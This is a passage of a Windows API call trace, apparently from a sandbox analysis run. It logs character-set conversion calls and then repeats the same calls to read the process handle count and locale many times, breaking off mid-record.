lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0068.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ|oM.\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0068.156] GetLastError () returned 0x0 [0068.156] SetLastError (dwErrCode=0x0) [0068.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ儒櫘᫄JĀ") returned 256 [0068.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ儒櫘᫄JĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0068.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ儒櫘᫄JĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0068.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ|oM.\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0068.157] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e61b) returned 0x0 [0068.158] RtlSizeHeap (HeapHandle=0x3f00000, Flags=0x0, MemoryPointer=0x3f02b20) returned 0x80 [0068.158] GetCurrentProcess () returned 0xffffffff [0068.158] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.159] GetSystemDefaultLangID () returned 0x230409 [0068.160] GetThreadLocale () returned 0x409 [0068.160] GetCurrentProcess () returned 0xffffffff [0068.160] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.160] GetSystemDefaultLangID () returned 0x230409 [0068.160] GetThreadLocale () returned 0x409 [0068.160] GetCurrentProcess () returned 0xffffffff [0068.160] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.160] GetSystemDefaultLangID () returned 0x230409 [0068.160] GetThreadLocale () returned 0x409 [0068.160] GetCurrentProcess () returned 0xffffffff [0068.160] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.160] GetSystemDefaultLangID () returned 0x230409 [0068.160] GetThreadLocale () returned 0x409 [0068.160] GetCurrentProcess () returned 0xffffffff [0068.160] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.160] GetSystemDefaultLangID () returned 0x230409 [0068.160] GetThreadLocale () returned 0x409 [0068.160] GetCurrentProcess () returned 0xffffffff [0068.160] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.161] GetSystemDefaultLangID () returned 0x230409 [0068.161] GetThreadLocale () returned 0x409 [0068.161] GetCurrentProcess () returned 0xffffffff [0068.161] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.161] GetSystemDefaultLangID () returned 0x230409 [0068.161] GetThreadLocale () returned 0x409 [0068.161] GetCurrentProcess () returned 0xffffffff [0068.161] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.161] GetSystemDefaultLangID () returned 0x230409 [0068.161] GetThreadLocale () returned 0x409 [0068.161] GetCurrentProcess () returned 0xffffffff [0068.161] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.161] GetSystemDefaultLangID () returned 0x230409 [0068.161] GetThreadLocale () returned 0x409 [0068.161] GetCurrentProcess () returned 0xffffffff [0068.161] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.161] GetSystemDefaultLangID () returned 0x230409 [0068.161] GetThreadLocale () returned 0x409 [0068.161] GetCurrentProcess () returned 0xffffffff [0068.162] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.162] GetSystemDefaultLangID () returned 0x230409 [0068.162] GetThreadLocale () returned 0x409 [0068.162] GetCurrentProcess () returned 0xffffffff [0068.162] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.162] GetSystemDefaultLangID () returned 0x230409 [0068.162] GetThreadLocale () returned 0x409 [0068.162] GetCurrentProcess () returned 0xffffffff [0068.162] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.162] GetSystemDefaultLangID () returned 0x230409 [0068.162] GetThreadLocale () returned 0x409 [0068.162] GetCurrentProcess () returned 0xffffffff [0068.162] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.162] GetSystemDefaultLangID () returned 0x230409 [0068.162] GetThreadLocale () returned 0x409 [0068.162] GetCurrentProcess () returned 0xffffffff [0068.162] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.162] GetSystemDefaultLangID () returned 0x230409 [0068.163] GetThreadLocale () returned 0x409 [0068.163] GetCurrentProcess () returned 0xffffffff [0068.163] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.163] GetSystemDefaultLangID () returned 0x230409 [0068.163] GetThreadLocale () returned 0x409 [0068.163] GetCurrentProcess () returned 0xffffffff [0068.163] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.163] GetSystemDefaultLangID () returned 0x230409 [0068.163] GetThreadLocale () returned 0x409 [0068.163] GetCurrentProcess () returned 0xffffffff [0068.163] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.163] GetSystemDefaultLangID () returned 0x230409 [0068.163] GetThreadLocale () returned 0x409 [0068.163] GetCurrentProcess () returned 0xffffffff [0068.163] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.163] GetSystemDefaultLangID () returned 0x230409 [0068.163] GetThreadLocale () returned 0x409 [0068.163] GetCurrentProcess () returned 0xffffffff [0068.163] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.164] GetSystemDefaultLangID () returned 0x230409 [0068.164] GetThreadLocale () returned 0x409 [0068.164] GetCurrentProcess () returned 0xffffffff [0068.164] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.164] GetSystemDefaultLangID () returned 0x230409 [0068.164] GetThreadLocale () returned 0x409 [0068.164] GetCurrentProcess () returned 0xffffffff [0068.164] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.164] GetSystemDefaultLangID () returned 0x230409 [0068.164] GetThreadLocale () returned 0x409 [0068.164] GetCurrentProcess () returned 0xffffffff [0068.164] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.164] GetSystemDefaultLangID () returned 0x230409 [0068.164] GetThreadLocale () returned 0x409 [0068.164] GetCurrentProcess () returned 0xffffffff [0068.164] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.164] GetSystemDefaultLangID () returned 0x230409 [0068.164] GetThreadLocale () returned 0x409 [0068.164] GetCurrentProcess () returned 0xffffffff [0068.165] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.165] GetSystemDefaultLangID () returned 0x230409 [0068.165] GetThreadLocale () returned 0x409 [0068.165] GetCurrentProcess () returned 0xffffffff [0068.165] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.165] GetSystemDefaultLangID () returned 0x230409 [0068.165] GetThreadLocale () returned 0x409 [0068.165] GetCurrentProcess () returned 0xffffffff [0068.165] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.165] GetSystemDefaultLangID () returned 0x230409 [0068.165] GetThreadLocale () returned 0x409 [0068.165] GetCurrentProcess () returned 0xffffffff [0068.165] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.165] GetSystemDefaultLangID () returned 0x230409 [0068.165] GetThreadLocale () returned 0x409 [0068.165] GetCurrentProcess () returned 0xffffffff [0068.165] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.165] GetSystemDefaultLangID () returned 0x230409 [0068.165] GetThreadLocale () returned 0x409 [0068.165] GetCurrentProcess () returned 0xffffffff [0068.165] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.166] GetSystemDefaultLangID () returned 0x230409 [0068.166] GetThreadLocale () returned 0x409 [0068.166] GetCurrentProcess () returned 0xffffffff [0068.166] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.166] GetSystemDefaultLangID () returned 0x230409 [0068.166] GetThreadLocale () returned 0x409 [0068.166] GetCurrentProcess () returned 0xffffffff [0068.166] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.166] GetSystemDefaultLangID () returned 0x230409 [0068.166] GetThreadLocale () returned 0x409 [0068.166] GetCurrentProcess () returned 0xffffffff [0068.166] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.166] GetSystemDefaultLangID () returned 0x230409 [0068.166] GetThreadLocale () returned 0x409 [0068.166] GetCurrentProcess () returned 0xffffffff [0068.166] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.166] GetSystemDefaultLangID () returned 0x230409 [0068.166] GetThreadLocale () returned 0x409 [0068.166] GetCurrentProcess () returned 0xffffffff [0068.166] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.166] GetSystemDefaultLangID () returned 0x230409 [0068.166] GetThreadLocale () returned 0x409 [0068.167] GetCurrentProcess () returned 0xffffffff [0068.167] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.167] GetSystemDefaultLangID () returned 0x230409 [0068.167] GetThreadLocale () returned 0x409 [0068.167] GetCurrentProcess () returned 0xffffffff [0068.167] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.167] GetSystemDefaultLangID () returned 0x230409 [0068.167] GetThreadLocale () returned 0x409 [0068.167] GetCurrentProcess () returned 0xffffffff [0068.167] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.167] GetSystemDefaultLangID () returned 0x230409 [0068.167] GetThreadLocale () returned 0x409 [0068.167] GetCurrentProcess () returned 0xffffffff [0068.167] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.167] GetSystemDefaultLangID () returned 0x230409 [0068.167] GetThreadLocale () returned 0x409 [0068.167] GetCurrentProcess () returned 0xffffffff [0068.167] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.167] GetSystemDefaultLangID () returned 0x230409 [0068.167] GetThreadLocale () returned 0x409 [0068.167] GetCurrentProcess () returned 0xffffffff [0068.167] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.168] GetSystemDefaultLangID () returned 0x230409 [0068.168] GetThreadLocale () returned 0x409 [0068.168] GetCurrentProcess () returned 0xffffffff [0068.168] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.168] GetSystemDefaultLangID () returned 0x230409 [0068.168] GetThreadLocale () returned 0x409 [0068.168] GetCurrentProcess () returned 0xffffffff [0068.168] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.168] GetSystemDefaultLangID () returned 0x230409 [0068.168] GetThreadLocale () returned 0x409 [0068.168] GetCurrentProcess () returned 0xffffffff [0068.168] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.168] GetSystemDefaultLangID () returned 0x230409 [0068.168] GetThreadLocale () returned 0x409 [0068.168] GetCurrentProcess () returned 0xffffffff [0068.168] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.168] GetSystemDefaultLangID () returned 0x230409 [0068.168] GetThreadLocale () returned 0x409 [0068.168] GetCurrentProcess () returned 0xffffffff [0068.169] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.169] GetSystemDefaultLangID () returned 0x230409 [0068.169] GetThreadLocale () returned 0x409 [0068.169] GetCurrentProcess () returned 0xffffffff [0068.169] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.169] GetSystemDefaultLangID () returned 0x230409 [0068.169] GetThreadLocale () returned 0x409 [0068.169] GetCurrentProcess () returned 0xffffffff [0068.169] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.169] GetSystemDefaultLangID () returned 0x230409 [0068.169] GetThreadLocale () returned 0x409 [0068.169] GetCurrentProcess () returned 0xffffffff [0068.169] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.169] GetSystemDefaultLangID () returned 0x230409 [0068.169] GetThreadLocale () returned 0x409 [0068.169] GetCurrentProcess () returned 0xffffffff [0068.169] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.170] GetSystemDefaultLangID () returned 0x230409 [0068.170] GetThreadLocale () returned 0x409 [0068.170] GetCurrentProcess () returned 0xffffffff [0068.170] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.170] GetSystemDefaultLangID () returned 0x230409 [0068.170] GetThreadLocale () returned 0x409 [0068.170] GetCurrentProcess () returned 0xffffffff [0068.170] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.171] GetSystemDefaultLangID () returned 0x230409 [0068.171] GetThreadLocale () returned 0x409 [0068.171] GetCurrentProcess () returned 0xffffffff [0068.171] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.171] GetSystemDefaultLangID () returned 0x230409 [0068.171] GetThreadLocale () returned 0x409 [0068.171] GetCurrentProcess () returned 0xffffffff [0068.171] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.171] GetSystemDefaultLangID () returned 0x230409 [0068.171] GetThreadLocale () returned 0x409 [0068.171] GetCurrentProcess () returned 0xffffffff [0068.171] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.171] GetSystemDefaultLangID () returned 0x230409 [0068.171] GetThreadLocale () returned 0x409 [0068.171] GetCurrentProcess () returned 0xffffffff [0068.171] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.171] GetSystemDefaultLangID () returned 0x230409 [0068.171] GetThreadLocale () returned 0x409 [0068.171] GetCurrentProcess () returned 0xffffffff [0068.171] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.171] GetSystemDefaultLangID () returned 0x230409 [0068.171] GetThreadLocale () returned 0x409 [0068.172] GetCurrentProcess () returned 0xffffffff [0068.172] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.172] GetSystemDefaultLangID () returned 0x230409 [0068.172] GetThreadLocale () returned 0x409 [0068.172] GetCurrentProcess () returned 0xffffffff [0068.172] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.172] GetSystemDefaultLangID () returned 0x230409 [0068.172] GetThreadLocale () returned 0x409 [0068.172] GetCurrentProcess () returned 0xffffffff [0068.172] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.172] GetSystemDefaultLangID () returned 0x230409 [0068.172] GetThreadLocale () returned 0x409 [0068.172] GetCurrentProcess () returned 0xffffffff [0068.172] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.172] GetSystemDefaultLangID () returned 0x230409 [0068.172] GetThreadLocale () returned 0x409 [0068.172] GetCurrentProcess () returned 0xffffffff [0068.172] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.172] GetSystemDefaultLangID () returned 0x230409 [0068.172] GetThreadLocale () returned 0x409 [0068.172] GetCurrentProcess () returned 0xffffffff [0068.172] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.172] GetSystemDefaultLangID () returned 0x230409 [0068.172] GetThreadLocale () returned 0x409 [0068.172] GetCurrentProcess () returned 0xffffffff [0068.173] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.173] GetSystemDefaultLangID () returned 0x230409 [0068.173] GetThreadLocale () returned 0x409 [0068.173] GetCurrentProcess () returned 0xffffffff [0068.173] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.173] GetSystemDefaultLangID () returned 0x230409 [0068.173] GetThreadLocale () returned 0x409 [0068.173] GetCurrentProcess () returned 0xffffffff [0068.173] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.173] GetSystemDefaultLangID () returned 0x230409 [0068.173] GetThreadLocale () returned 0x409 [0068.173] GetCurrentProcess () returned 0xffffffff [0068.173] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.173] GetSystemDefaultLangID () returned 0x230409 [0068.173] GetThreadLocale () returned 0x409 [0068.173] 